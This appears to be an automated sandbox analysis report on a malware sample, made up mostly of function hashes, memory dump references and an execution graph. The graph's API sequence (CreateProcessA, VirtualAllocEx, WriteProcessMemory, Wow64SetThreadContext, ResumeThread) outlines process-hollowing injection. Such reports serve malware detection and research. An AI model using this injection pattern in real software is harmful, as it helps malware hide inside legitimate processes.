                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5e0092af723603efb155478e6098a2388da65b48ea7f970f2fd46dbca8bb5eee
                                                          • Instruction ID: f803ef863952a1d24eb7b81bee449b4f1f26a0dedd9ab1cc6b729ad063c43e19
                                                          • Opcode Fuzzy Hash: 5e0092af723603efb155478e6098a2388da65b48ea7f970f2fd46dbca8bb5eee
                                                          • Instruction Fuzzy Hash: E1D02B3030434CAFE7140B20D806936779DA7C2F44F6DC02B9015492A5CFA28D41D691
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D3DE4 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 50bb0ad5cbb1636eae68ab53cefbf5e04fa7bca7e63ef7eababe7439c9504b2d
                                                          • Instruction ID: 6582c94fb2fd199b8da11cb078936c7b12fe5fc44ca49739fb81b4168c0c8846
                                                          • Opcode Fuzzy Hash: 50bb0ad5cbb1636eae68ab53cefbf5e04fa7bca7e63ef7eababe7439c9504b2d
                                                          • Instruction Fuzzy Hash: 7EC08C723586BC230829329CB05646EA66D8A917213840837F429827828F804F000BCB
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0071083D Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.367583407.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_710000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01c8655399e07564188ae1ada722c7ac05b0db0c729942f7f78eccae8d8de9ca
                                                          • Instruction ID: 659075ed42c890f91e4696f997f1cef7af4af09600991e397c119ac63272aa45
                                                          • Opcode Fuzzy Hash: 01c8655399e07564188ae1ada722c7ac05b0db0c729942f7f78eccae8d8de9ca
                                                          • Instruction Fuzzy Hash: 78E0B639904219CFCB10CF51C940BE8BBB1BB49314F1481DAC519A72A6D736DA8ADF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001DB6B0 Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 77de7b7a2b09339718516eb7ecbc30dbafffea49cb34ee843badedef2caa6f9f
                                                          • Instruction ID: 814712905ed968ea55ed70d039638acebede5b93880b58594420c3c3ae669fd2
                                                          • Opcode Fuzzy Hash: 77de7b7a2b09339718516eb7ecbc30dbafffea49cb34ee843badedef2caa6f9f
                                                          • Instruction Fuzzy Hash: EEC012708042089BC710EFB8A85C7297B98D705211F000056D40983160DB31454496A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001DBD1D Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd05523a9fc4062f2e1dc56bd10114121ab3b89bb04d5b3940f8bff0d4a26d6c
                                                          • Instruction ID: b1cbb9f85edd1650870e622a7cebc8d15798fcf8bf34f1c6451089b03adcf8bc
                                                          • Opcode Fuzzy Hash: fd05523a9fc4062f2e1dc56bd10114121ab3b89bb04d5b3940f8bff0d4a26d6c
                                                          • Instruction Fuzzy Hash: 0FD01270905319CFCBC8DB64DC80B8CB7B2EF44300F50D995D009A7164DB709A498F04
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00710677 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.367583407.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_710000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d592d1e3b376ef3a84c4209602023a311ba4dd1a4b4dd729c997abe4387001fc
                                                          • Instruction ID: 0b547ca69be9ff950a57aacc6750ee2da83a91860baf86f5df31a17ba8c94dab
                                                          • Opcode Fuzzy Hash: d592d1e3b376ef3a84c4209602023a311ba4dd1a4b4dd729c997abe4387001fc
                                                          • Instruction Fuzzy Hash: 0AD012B4C1F048CFCB50FB7499482E476F9E75A305F1420A9940DD7202D1745AE0DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 002E34F0 Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (c#
                                                          • API String ID: 0-631801692
                                                          • Opcode ID: bf98060c3ce7a210d5194e8d9b343c5502ce8d9af7fdb9a27b923dfb9eb41e5a
                                                          • Instruction ID: 22155b8ff3f54ef41a058245196fafe3ed9080b54972a6785b936ffae67ac1a2
                                                          • Opcode Fuzzy Hash: bf98060c3ce7a210d5194e8d9b343c5502ce8d9af7fdb9a27b923dfb9eb41e5a
                                                          • Instruction Fuzzy Hash: 2881F0718246D4DFCB00DF7AC8486AEBBF0BF09302F8485ABE455EB292D3758A55CB11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002EB048 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5d7045afcec6359608189497a9c7af048c293c44e5df969b55d69b557418bb5
                                                          • Instruction ID: e97247a854621fedbb8755423235d29fb133fd305e7dc3bc0c4e270c263b2e78
                                                          • Opcode Fuzzy Hash: f5d7045afcec6359608189497a9c7af048c293c44e5df969b55d69b557418bb5
                                                          • Instruction Fuzzy Hash: 00E1EA74E101598FDB18DFA9C5909AEFBF2FF89304F24816AD914AB35AD730A941CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002EB480 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8419a91237193e70acefcafd21470035828ede5536aaa3803edd46609c336396
                                                          • Instruction ID: 6a67c39875542c8e8053ac910993693506253f24333150b962c8c1f78a06df03
                                                          • Opcode Fuzzy Hash: 8419a91237193e70acefcafd21470035828ede5536aaa3803edd46609c336396
                                                          • Instruction Fuzzy Hash: 6FE1DA74E101598FDB18DF99C5849AEFBF2FF89304F64816AD414A735AD7309942CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002EB968 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f193401fb6eb17719e766c88d20386e128b63214e6edd8c9c7db37ff18667dc
                                                          • Instruction ID: 6a7b5d48f872b9a20846e6ba5b5d6bfba8d819de11bc33f085f956d678a200f6
                                                          • Opcode Fuzzy Hash: 8f193401fb6eb17719e766c88d20386e128b63214e6edd8c9c7db37ff18667dc
                                                          • Instruction Fuzzy Hash: D1E1EA74E141598FCB14DFA9C584AAEFBF2FF89304F24816AD814A735AD7309942CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002EAC10 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3534544d4fd7f958423e8ac8ef04e15f3214a389085a36f9ff94b6201bc11d26
                                                          • Instruction ID: c2bf7b35332c3f92f7485c5af806af6f06c9213dce6997a813e01bfff9007e9b
                                                          • Opcode Fuzzy Hash: 3534544d4fd7f958423e8ac8ef04e15f3214a389085a36f9ff94b6201bc11d26
                                                          • Instruction Fuzzy Hash: D8E10974E101598FCB18DF99C580AAEFBF2FF89304F64816AD814A735AD731A942CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002EBDA0 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 738ceb6b4f2c4a99042f76c9247aa136696c42248884ff5080df1ebec8968957
                                                          • Instruction ID: 40f772befe2a257f4b92c61416fce5cc02aabd1ec7fcb1dcb74c6c089e84dab1
                                                          • Opcode Fuzzy Hash: 738ceb6b4f2c4a99042f76c9247aa136696c42248884ff5080df1ebec8968957
                                                          • Instruction Fuzzy Hash: 43E1D974E105598FDB18DF99C580AAEFBF2FF89304F64816AD814AB356D730A942CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001DFA48 Relevance: .2, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6be6357dafcc12e9dadf8848ff2fc6c7dcd8d756c82b5d0daa5553cb89cf9c95
                                                          • Instruction ID: 02cd64887ae94b28f152d5ce21c481004d3032a99d499bc0608a1e48bbf2edc3
                                                          • Opcode Fuzzy Hash: 6be6357dafcc12e9dadf8848ff2fc6c7dcd8d756c82b5d0daa5553cb89cf9c95
                                                          • Instruction Fuzzy Hash: 3E81B074E1021ACFCB44CFA9D58499EBBF1FF88310B25956AD41AAB320D334AA42CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002E0A41 Relevance: .2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d5fd5dc3c2eabca534991c69fcc5a13da723c4aad3e040590e6267d18cf8bb34
                                                          • Instruction ID: 876ee0f7523202f1a92b63d91b3e12e1b9ae241a8c179c54aa5bfcc19ab42d41
                                                          • Opcode Fuzzy Hash: d5fd5dc3c2eabca534991c69fcc5a13da723c4aad3e040590e6267d18cf8bb34
                                                          • Instruction Fuzzy Hash: 9E613870E5424A9FCB04CFAAD4815EEFBB2BF49300F64C46AD515A7305D3B49A92CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002E0FF9 Relevance: .2, Instructions: 157COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5b86991cfb07639eb14341e17747eff9df8d7935d06637ce8bb3e8d7beb9eaa6
                                                          • Instruction ID: 27d3784255931542de10b19436765a7b3130ba375d516fab0b73ef4388f04eb5
                                                          • Opcode Fuzzy Hash: 5b86991cfb07639eb14341e17747eff9df8d7935d06637ce8bb3e8d7beb9eaa6
                                                          • Instruction Fuzzy Hash: FA61CFB096A689DECB04CF96F9CD25DBFB1FB89300F20A4E6C4859A164D77447B4DB04
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002E2BF8 Relevance: .1, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 373ac12543534ae23f3f6bb6b930237aae388f8d0d1334c7f428765952ffc3d9
                                                          • Instruction ID: 740399084a41153f946d917e00e50a78f9ff54bb19d43d51519cfd200d999b83
                                                          • Opcode Fuzzy Hash: 373ac12543534ae23f3f6bb6b930237aae388f8d0d1334c7f428765952ffc3d9
                                                          • Instruction Fuzzy Hash: 94514E70E5525ADFCF18CFA6E8855AEFBF6FF88310F20942AD406A7264D7345A418F90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002EAC02 Relevance: .1, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea10c7ec4c87073ffc145aecffff3042c9fece5be14a7d99c87fe6980b6f3275
                                                          • Instruction ID: 7b4e847642cf73b1e51164679edeacad20512304b64ae5935ed3cd2b889404b1
                                                          • Opcode Fuzzy Hash: ea10c7ec4c87073ffc145aecffff3042c9fece5be14a7d99c87fe6980b6f3275
                                                          • Instruction Fuzzy Hash: 1D512A74E102598FDB18CFAAC5805AEFBF2FF89305F24816AD418A7256D731A942CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002E0DB0 Relevance: .1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 871771cca3224256a93cd6fc471096952fe54ef79ee0b3da28df8245245cbdef
                                                          • Instruction ID: dd45488b57885ed8c5dbe72ddacf5d7742a3244a0f6e251272515c4f35b00494
                                                          • Opcode Fuzzy Hash: 871771cca3224256a93cd6fc471096952fe54ef79ee0b3da28df8245245cbdef
                                                          • Instruction Fuzzy Hash: 934128B0D1524ADFCB48CFAAD4805AEFBF2BF89300F28C46AC415E7254D7749A928F54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002E0DC0 Relevance: .1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360836420.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2e0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 11791e2a9623f6cd9dad4a1192bfa8a299c35961743030ed9cf64fdef66f4936
                                                          • Instruction ID: 48f2aa51431235a6980e73a27bf2d8143e500c606247156bffac3630c27db690
                                                          • Opcode Fuzzy Hash: 11791e2a9623f6cd9dad4a1192bfa8a299c35961743030ed9cf64fdef66f4936
                                                          • Instruction Fuzzy Hash: 6D41E7B0D1420ADFCB48CFAAD4815EEFBF2BF88300F64D46AC415A7254D7749AA28F54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0071064B Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.367583407.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_710000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 835755231a97097996091cf2cba9d48a352c886710f4f602bc61180480e43ef4
                                                          • Instruction ID: 5de294d112145af3d2a06ca439b395e850745852c5cd1510e51de7e6ecc05878
                                                          • Opcode Fuzzy Hash: 835755231a97097996091cf2cba9d48a352c886710f4f602bc61180480e43ef4
                                                          • Instruction Fuzzy Hash: D3B0926AE8D004918B100C8C68100F8F33C828B226F2071A2920EA3481519886E62AE8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001D1E80 Relevance: 11.3, Strings: 9, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "$LRp$LRp$LRp$$p$$p$$p$$p$$p
                                                          • API String ID: 0-288678259
                                                          • Opcode ID: 0f1cc044b6f6fdfdf2e07ccc0c329bfb0c3018949f1df8ff851befc2651e067b
                                                          • Instruction ID: 2811c5d3bcb39feeb883ade12a4cef52f60458844818dbc20ed7c1f5e982b120
                                                          • Opcode Fuzzy Hash: 0f1cc044b6f6fdfdf2e07ccc0c329bfb0c3018949f1df8ff851befc2651e067b
                                                          • Instruction Fuzzy Hash: 4D31D172E08221FBC7159FA9C980A7BB7A5AB89310F25852BE826D6381D3349948C621
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 001DA170 Relevance: 6.4, Strings: 5, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.360132480.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1d0000_obimohohj75.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: =$$p$$p$`#$e#
                                                          • API String ID: 0-1127883702
                                                          • Opcode ID: 666ba559bc18d421ad227e9a65270f414d1111bf8c9c9a36d4e28e4eb9f8e823
                                                          • Instruction ID: b015368c4acf0b936897be1e79aac14bbfe2690e7b81d8ed31418ab89e58862d
                                                          • Opcode Fuzzy Hash: 666ba559bc18d421ad227e9a65270f414d1111bf8c9c9a36d4e28e4eb9f8e823
                                                          • Instruction Fuzzy Hash: D141BD30914225CBDB08DF69C8502BEBBF1FF45301F958A27E065E6391D3388989DBA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Execution Graph

                                                          Execution Coverage:14.3%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:93
                                                          Total number of Limit Nodes:1
                                                          execution_graph 11139 55d415 11140 55d28d 11139->11140 11141 55d2e2 11139->11141 11140->11141 11145 55f36e 11140->11145 11160 55f308 11140->11160 11174 55f2f9 11140->11174 11146 55f2fc 11145->11146 11147 55f371 11145->11147 11148 55f32a 11146->11148 11188 8d0304 11146->11188 11192 8d020b 11146->11192 11197 8d016c 11146->11197 11201 8d05ad 11146->11201 11205 8d0316 11146->11205 11209 8d0297 11146->11209 11213 8d04da 11146->11213 11217 8d01bf 11146->11217 11221 8d00ff 11146->11221 11224 8d083d 11146->11224 11227 8d06c3 11146->11227 11147->11141 11148->11141 11161 55f322 11160->11161 11162 8d05ad ResumeThread 11161->11162 11163 8d016c ResumeThread 11161->11163 11164 8d020b 2 API calls 11161->11164 11165 8d0304 Wow64SetThreadContext 11161->11165 11166 8d06c3 2 API calls 11161->11166 11167 8d083d Wow64SetThreadContext 11161->11167 11168 8d00ff CreateProcessA 11161->11168 11169 8d01bf ResumeThread 11161->11169 11170 55f32a 11161->11170 11171 8d04da 2 API calls 11161->11171 11172 8d0297 2 API calls 11161->11172 11173 8d0316 2 API calls 11161->11173 11162->11170 11163->11170 11164->11170 11165->11170 11166->11170 11167->11170 11168->11170 11169->11170 11170->11141 11171->11170 11172->11170 11173->11170 11175 55f2ff 11174->11175 11176 8d05ad ResumeThread 11175->11176 11177 8d016c ResumeThread 11175->11177 11178 8d020b 2 API calls 11175->11178 11179 8d0304 Wow64SetThreadContext 11175->11179 11180 8d06c3 2 API calls 11175->11180 11181 8d083d Wow64SetThreadContext 11175->11181 11182 8d00ff CreateProcessA 11175->11182 11183 8d01bf ResumeThread 11175->11183 11184 55f32a 11175->11184 11185 8d04da 2 API calls 11175->11185 11186 8d0297 2 API calls 11175->11186 11187 8d0316 2 API calls 11175->11187 11176->11184 11177->11184 11178->11184 11179->11184 11180->11184 11181->11184 11182->11184 11183->11184 11184->11141 11185->11184 11186->11184 11187->11184 11189 8d0841 11188->11189 11231 55c748 11189->11231 11193 8d0408 11192->11193 11194 8d0157 11192->11194 11235 55c9a0 11193->11235 11239 55c998 11193->11239 11194->11148 11198 8d0188 11197->11198 11243 55c658 11198->11243 11202 8d056c 11201->11202 11203 8d04ba 11201->11203 11204 55c658 ResumeThread 11202->11204 11203->11148 11204->11203 11247 55cb00 11205->11247 11251 55cafa 11205->11251 11206 8d033b 11206->11148 11211 55c9a0 WriteProcessMemory 11209->11211 11212 55c998 WriteProcessMemory 11209->11212 11210 8d02d1 11210->11148 11211->11210 11212->11210 11215 55c9a0 WriteProcessMemory 11213->11215 11216 55c998 WriteProcessMemory 11213->11216 11214 8d0157 11214->11148 11215->11214 11216->11214 11218 8d0164 11217->11218 11219 8d01cc 11217->11219 11220 55c658 ResumeThread 11218->11220 11219->11148 11220->11219 11255 55cd38 11221->11255 11225 8d085c 11224->11225 11226 55c748 Wow64SetThreadContext 11224->11226 11226->11225 11259 55c872 11227->11259 11263 55c878 11227->11263 11228 8d06e1 11228->11148 11232 55c791 Wow64SetThreadContext 11231->11232 11234 55c80f 11232->11234 11236 55c9ec WriteProcessMemory 11235->11236 11238 55ca8b 11236->11238 11238->11194 11240 55c99b WriteProcessMemory 11239->11240 11242 55ca8b 11240->11242 11242->11194 11244 55c69c ResumeThread 11243->11244 11246 55c6ee 11244->11246 11246->11148 11248 55cb4c ReadProcessMemory 11247->11248 11250 55cbca 11248->11250 11250->11206 11252 55cb4c ReadProcessMemory 11251->11252 11254 55cbca 11252->11254 11254->11206 11256 55cdbf CreateProcessA 11255->11256 11258 55d01d 11256->11258 11260 55c8bc VirtualAllocEx 11259->11260 11262 55c93a 11260->11262 11262->11228 11264 55c8bc VirtualAllocEx 11263->11264 11266 55c93a 11264->11266 11266->11228

                                                          Executed Functions

                                                          Function 0034C600 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 528 34c600-34c623 529 34c625 528->529 530 34c62a-34c6a0 call 340da4 528->530 529->530 536 34c6a3 530->536 537 34c6aa-34c6c6 536->537 538 34c6cf-34c6d0 537->538 539 34c6c8 537->539 548 34c81e-34c890 call 34c1ec call 34dd2c 538->548 539->536 539->538 540 34c6d5-34c6ea 539->540 541 34c7a6-34c7dc 539->541 542 34c777-34c7a1 539->542 543 34c730-34c734 539->543 544 34c760-34c772 539->544 545 34c7e1-34c7fd 539->545 546 34c802-34c819 539->546 547 34c6ec-34c708 539->547 539->548 540->537 541->537 542->537 549 34c736-34c745 543->549 550 34c747-34c74e 543->550 544->537 545->537 546->537 557 34c710-34c72b 547->557 562 34c896-34c8a0 548->562 555 34c755-34c75b 549->555 550->555 555->537 557->537
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Tep$Tep$)"
                                                          • API String ID: 0-2204700639
                                                          • Opcode ID: d7ba515d5acca620d97c4f7cd32cacaa6c477de4c3721fad659b6942f095f95c
                                                          • Instruction ID: fb768304aa267efdbc4496de02c2f36c2ce81221c6dd4184a7561523567ea7c8
                                                          • Opcode Fuzzy Hash: d7ba515d5acca620d97c4f7cd32cacaa6c477de4c3721fad659b6942f095f95c
                                                          • Instruction Fuzzy Hash: 1B81C474E112098FDB48CFAAC944A9EFBF2FF89300F24942AD416AB258D735A945CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00343E04 Relevance: 2.7, Strings: 2, Instructions: 200COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 690 343e04-3444ab 693 3444b0-3444b3 690->693 694 3444b5-3444e7 693->694 695 3444bc-3444e8 693->695 698 3444f2-3444f6 call 34410c 694->698 695->698 701 3444fb-34453a call 34411c 698->701 708 344540-34454c 701->708 709 346efa-346f74 701->709 708->693 711 346f76-346f8c 709->711 712 346fcf-346fda 709->712 713 346fe7-347010 711->713 712->713 715 347061-347073 713->715 716 347012-347014 713->716 719 347079-34707b 715->719 718 347016-347040 716->718 716->719 720 347042-347060 718->720 721 34708b 718->721 722 3470c0-3470cb 720->722 723 347062-347073 720->723
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: L08$l4
                                                          • API String ID: 0-2321431902
                                                          • Opcode ID: 1e77d76a4c9f8d0aecab6b3e7a689656cf4669ed5958336c9ce3f7ce0537d31b
                                                          • Instruction ID: 640e378204afc0187babf8886cc2a1c1407e8084c94909e80ed451540c8bb316
                                                          • Opcode Fuzzy Hash: 1e77d76a4c9f8d0aecab6b3e7a689656cf4669ed5958336c9ce3f7ce0537d31b
                                                          • Instruction Fuzzy Hash: 7D51043140A7946FEF579F3898536D77BE8BF03304B4564EAD8009F293C620AA47E796
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0034EBA8 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.376724413.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_340000_pgZzUFYKXcIRkU.jbxd
                                                          Similarity
